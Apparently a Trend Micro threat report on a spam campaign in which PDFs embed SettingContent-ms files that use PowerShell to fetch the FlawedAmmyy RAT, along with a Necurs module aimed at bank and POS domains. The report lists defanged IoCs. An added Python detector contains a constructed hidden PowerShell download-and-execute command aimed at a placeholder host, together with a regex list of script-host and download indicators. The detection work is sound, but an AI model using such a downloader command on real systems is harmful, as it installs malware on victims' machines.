By Anita Hsieh, Rubio Wu, and Kawabata Kohei
Trend Micro detected a spam campaign that drops the same FlawedAmmyy RAT (remote access Trojan) used by a Necurs module to install its final payload on bots under bank- and POS-related user domains. The spam campaign was also found abusing SettingContent-ms – an XML format shortcut file that opens Microsoft’s Windows Settings panel. Malicious SettingContent-ms files were found embedded in a PDF document that drops the aforementioned RAT.
Figure 1. The volume of spam emails on July 12 and 13
From our research and analysis of spam emails sent on July 12 and 13, more than 50 percent of the email accounts that received this spam belonged to banks located in countries like Malaysia, Indonesia, Kenya, Romania, Poland, and Austria.
Figure 2. Infection chain of the spam campaign
Once the “downl.SettingContent-ms” file is opened, Windows will run the PowerShell command inside the <DeepLink> tag, which will download the FlawedAmmyy RAT from hxxp://169[.]239[.]129[.]117/cal before executing it. This FlawedAmmyy RAT variant is the same one installed by a Necurs module on bots under bank- and POS-related user domains.
Figure 8. The content of the “downl.SettingContent-ms” file that contains the PowerShell command for downloading the FlawedAmmyy RAT
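As an added illustration (not code from the original post), the following stdlib-only Python checker parses a SettingContent-ms document and flags any <DeepLink> value that carries script-host or download indicators, the behaviour described above. Both sample documents are constructed, and the URL is a placeholder rather than the campaign's.

```python
import re
import xml.etree.ElementTree as ET


def sample(deeplink: str) -> str:
    """Build a constructed SettingContent-ms document around the given DeepLink."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>{deeplink}</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>"""


# A legitimate Settings shortcut points at control.exe or an ms-settings: URI.
BENIGN_LINK = "%windir%\\system32\\control.exe /name Microsoft.Personalization"
# Constructed stand-in for the campaign's downloader command; placeholder URL.
MALICIOUS_LINK = (
    "powershell.exe -NoProfile -WindowStyle Hidden -Command "
    "\"(New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/cal', "
    "'%TEMP%\\cal.exe'); Start-Process '%TEMP%\\cal.exe'\""
)

# Tokens that have no business in a Settings shortcut's DeepLink.
SUSPICIOUS = re.compile(
    r"(powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32|certutil|"
    r"bitsadmin|https?://|downloadfile|downloadstring|invoke-webrequest|\biex\b|"
    r"frombase64string|-enc)", re.I)


def deep_links(xml_text: str) -> list[str]:
    """Return the text of every DeepLink element, regardless of namespace."""
    # For files of unknown origin prefer defusedxml; ElementTree keeps this stdlib-only.
    root = ET.fromstring(xml_text)
    return [el.text.strip() for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "DeepLink" and el.text]


def analyze(xml_text: str) -> list[dict]:
    """Flag each DeepLink whose command carries script-host or download indicators."""
    report = []
    for link in deep_links(xml_text):
        hits = sorted({m.lower() for m in SUSPICIOUS.findall(link)})
        report.append({"deeplink": link, "indicators": hits, "suspicious": bool(hits)})
    return report


if __name__ == "__main__":
    for name, link in (("benign", BENIGN_LINK), ("malicious", MALICIOUS_LINK)):
        print(name, analyze(sample(link)))
```

Run the same check over `.SettingContent-ms` attachments extracted from PDFs or mail at the gateway; any DeepLink that does not resolve to control.exe or an ms-settings: URI is worth quarantining.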
FlawedAmmyy RAT – the spam campaign’s connection to Necurs
Recently, Necurs has been showing interest in bots with specific characteristics. On July 12, Necurs pushed a module – a downloader of the FlawedAmmyy RAT – to its bots. The module checked if the domain name contained any of the following keywords: bank, banc, aloha, aldelo, and postilion (as seen in Figure 10). Aloha is a restaurant POS system, Aldelo is an iPad POS system, while Postilion is a solution for acquiring payments or transactions across all channels, from ATM and POS to ecommerce and mobile. It downloads and executes the final payload from hxxp://169[.]239[.]129[.]117/Yjdfel765Hs if the bot’s user domain matches Necurs’ criteria.
Figure 9. The module obtained the bot’s user domain via the cmd command echo %%USERDOMAIN%%
Figure 10. The module checks if the user domain contains any of the highlighted keywords
Trend Micro Solutions
To defend against spam and threats like Necurs, businesses can take advantage of Trend Micro™ endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security. Both solutions can protect users and businesses from threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs. Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachments and URLs.
Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365, Google Apps, and other hosted and on-premises email solutions.
Trend Micro™ OfficeScan™ with XGen™ endpoint security infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against advanced malware.
Indicators of compromise (IoCs)
|Indicator|Type|Description|
|---|---|---|
||SHA256|Necurs module that checks if the bot is potentially bank- or POS-related|
||SHA256|PDF used in the spamming campaign on July 12 and 13|
||SHA256|FlawedAmmyy RAT dropped by the Necurs module and the spam campaign on July 12|
|185[.]99[.]132[.]119:443|IP + Port|C&C of the FlawedAmmyy RAT|
|hxxp://169[.]239[.]129[.]117/Yjdfel765Hs|URL|URL used to download the FlawedAmmyy RAT in the Necurs module|
|hxxp://169[.]239[.]129[.]117/cal|URL|URL used to download the FlawedAmmyy RAT in the SettingContent-ms file embedded in the PDF|